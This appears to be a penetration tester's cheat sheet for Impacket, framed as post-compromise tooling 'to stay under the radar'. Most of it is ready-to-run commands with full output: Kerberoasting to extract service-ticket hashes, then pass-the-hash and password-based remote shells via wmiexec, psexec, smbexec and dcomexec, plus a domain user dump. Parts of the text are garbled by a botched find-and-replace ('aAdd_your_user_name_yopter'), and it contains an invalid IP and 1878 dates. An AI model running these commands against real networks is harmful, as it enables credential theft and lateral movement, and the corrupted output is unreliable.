After gaining access to accounts impacket can be useful to help stay under the radar.

----------------------------------------

To install impacket

Most errors with impacket are a result that people haven’t installed it.

https://github.com/CoreSecurity/impacket.git

cd impacket
root@kali:~/Documents/impacket#pip install .
root@kali:~/Documents/impacket# python setup.py install

----------------------------------------
Kerberoast

root@kali:~# python /usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 192.018.20.200 space.hopper/pinkydinkydo

Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
ServicePrincipalName                         Name         MemberOf                                         PasswordLastSet      LastLogon           
-------------------------------------------  -----------  -----------------------------------------------  -------------------  -------------------
YepYepItsMeYo/Snake.space.hopper:1433        The_Mr_T_admin  CN=Domain Admins,CN=Users,DC=space,DC=hopper  1878-03-30 01:52:19  1878-03-29 00:19:39 
YepYepItsMeYo/Snake.space.hopper:SQLEXPRESS  The_Mr_T_admin  CN=Domain Admins,CN=Users,DC=space,DC=hopper  1878-03-30 01:52:19  1878-03-29 00:19:39 
GimyT/space.hopper:80                     GimyT                                                         1878-03-30 18:30:39  1878-04-03 10:32:43 


$krb5tgs$23$*GimyT$space.hopper$GimyT/space.hopper~80*$ab123f672a12d15a4a100f55a4421$Redaction3ab4d3a35b21988011fd383159eRedaction

For more on Kerberoast https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/

----------------------------------------

python wmiexec.py Add-Domain-name/Add-User@Add-target-IP-Address -hashes Add-NTLMv2-Hash

root@kali:~/Documents/impacket/examples# python wmiexec.py space.hopper/PinkyDo@192.168.15.78 -hashes bbd12345b51404eeaad3b435aac1a143:19767e4cdca57e93b111a9bb506add2
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.15.78
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.15.200

C:\>

----------------------------------------

Use the below to change the password on a target host, but be careful using this, as you want to keep any local admin hashes intact so you can pass-the-hash PTH.

root@kali:~/Documents/impacket/examples# python wmiexec.py space.hopper/PinkyDo@192.168.15.78 -hashes bbd12345b51404eeaad3b435aac1a143:19767e4cdca57e93b111a9bb506add2
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Type help for list of commands
# help

 open {host,port=445} - opens a SMB connection against the target host/port
 login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
 kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
 login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
 logoff - logs off
 shares - list available shares
 use {sharename} - connect to an specific share
 cd {path} - changes the current directory to {path}
 lcd {path} - changes the current local directory to {path}
 pwd - shows current remote directory
 password - changes the user password, the new password will be prompted for input
 ls {wildcard} - lists all the files in the current directory
 rm {file} - removes the selected file
 mkdir {dirname} - creates the directory under the current path
 rmdir {dirname} - removes the directory under the current path
 put {filename} - uploads the filename into the current path
 get {filename} - downloads the filename from the current path
 mount {target,path} - creates a mount point from {path} to {target} (admin required)
 umount {path} - removes the mount point at {path} without deleting the directory (admin required)
 list_snapshots {path} - lists the vss snapshots for the specified path
 info - returns NetrServerInfo main results
 who - returns the sessions currently connected at the target host (admin required)
 close - closes the current SMB Session
 exit - terminates the server process (and this session)
 
 ----------------------------------------
 

lateral movement

Original post

https://www.infosecmatter.com/rce-on-windows-from-linux-part-1-impacket/#1-impacket-psexecpy

Domain Admin account

oot@kali:~/Documents/impacket/examples# psexec.py ".hacklab.local/Add_your_user_name_yo:Add_Your_PassWordsYo"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 192.168.1.200.....
[*] Found writable share ADMIN$
[*] Uploading file lOQgqnWy.exe
[*] Opening SVCManager on 192.168.1.200.....
[*] Creating service fOFX on 192.168.1.200.....
[*] Starting service fOFX.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>net user /domain

User accounts for \\

-------------------------------------------------------------------------------
admin                    Administrator            YepYepYep                       
Guest                    hellopoopy1                                  
user1                    YeetOof1                  

Local Admin account

psexec.py "./Add_your_user_name_yo:Add_Your_PassWordsYo1!"@192.168.1.200

root@kali:~/Documents/impacket/examples# python psexec.py "./Add_your_user_name_yo:Add_Your_PassWordsYo1!"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 192.168.1.200.....
[*] Found writable share ADMIN$
[*] Uploading file heMDCixC.exe
[*] Opening SVCManager on 192.168.1.200.....
[*] Creating service LsVs on 192.168.1.200.....
[*] Starting service LsVs.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>


root@kali:~/Documents/impacket/examples# psexec.py -hashes aad3b435b51303909808abc1251404ee:fc525c9683e8fe666808aef123971889 "./Administrator"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 192.168.1.200.....
[*] Found writable share ADMIN$
[*] Uploading file wQpQXSNd.exe
[*] Opening SVCManager on 192.168.1.200.....
[*] Creating service wXcl on 192.168.1.200.....
[*] Starting service wXcl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

------------------------------------

I suspect it only works with SMBv3?

root@kali:~/Documents/impacket/examples# dcomexec.py "./Add_your_user_name_yo:Add_Your_PassWordsYo1!"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv2.1 dialect used
[-] DCOM SessionError: unknown error code: 0x800706ba


-------------------------------------

smbexec.py "./Add_your_user_name_yo:Add_Your_PassWordsYo1!"@192.168.1.200

root@kali:~/Documents/impacket/examples# python smbexec.py "./Add_your_user_name_yo:Add_Your_PassWordsYo1!"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet aAdd_your_user_name_yopter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   
   IPv4 Address. . . . . . . . . . . : 192.168.1.200
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

Tunnel aAdd_your_user_name_yopter isatap.{8AA197BF-E3C8-4397-B277-7135B83C4BA0}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>


smbexec.py -hashes aad3b435b51303909808abc1251404ee:fc525c9683e8fe666808aef123971889 "./Administrator"@192.168.1.200

root@kali:~/Documents/impacket/examples# smbexec.py -hashes aad3b435b51303909808abc1251404ee:fc525c9683e8fe666808aef123971889 "./Administrator"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet aAdd_your_user_name_yopter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   
   IPv4 Address. . . . . . . . . . . : 192.168.1.200
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

Tunnel aAdd_your_user_name_yopter isatap.{8AA197BF-E3C8-4397-B277-7135B83C4BA0}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 


-------------------------------------

wmiexec.py "./Add_your_user_name_yo:Add_Your_PassWordsYo1!"@192.168.1.200

root@kali:~/Documents/impacket/examples# wmiexec.py "./Add_your_user_name_yo:Add_Your_PassWordsYo1!"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 849F-2E72

 Directory of C:\

07/14/2009  04:20 AM    <DIR>          PerfLogs
04/24/2020  01:39 PM    <DIR>          Program Files
04/24/2020  01:39 PM    <DIR>          Program Files (x86)
04/24/2020  01:34 PM    <DIR>          Users
05/04/2020  01:53 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  21,486,166,016 bytes free

C:\>


wmiexec.py -hashes aad3b435b51303909808abc1251404ee:fc525c9683e8fe666808aef123971889 "./Administrator"@192.168.1.200

------------------------------------------

root@kali:~/Documents/impacket/examples# wmiexec.py -hashes aad3b435b51303909808abc1251404ee:fc525c9683e8fe666808aef123971889 "./Administrator"@192.168.1.200
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig

Windows IP Configuration


Ethernet aAdd_your_user_name_yopter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   
   IPv4 Address. . . . . . . . . . . : 192.168.1.200
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

Tunnel aAdd_your_user_name_yopter isatap.{8AA197BF-E3C8-4397-B277-7135B83C4BA0}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\>

-------------------------------------

9.21-dev - Copyright 2019 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \xKHbNiPY
[*] Running task \xKHbNiPY
[*] Deleting task \xKHbNiPY
[*] Attempting to read ADMIN$\Temp\xKHbNiPY.tmp
[*] Attempting to read ADMIN$\Temp\xKHbNiPY.tmp

Host Name:                 WIN-VNB7GCMKUO7
OS Name:                   Microsoft Windows Server 2008 R2 Add_your_user_name_yotacenter 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001526-84264
Original Install Add_your_user_name_yote:     4/24/2020, 1:34:57 PM
System Boot Time:          4/24/2020, 1:41:41 PM

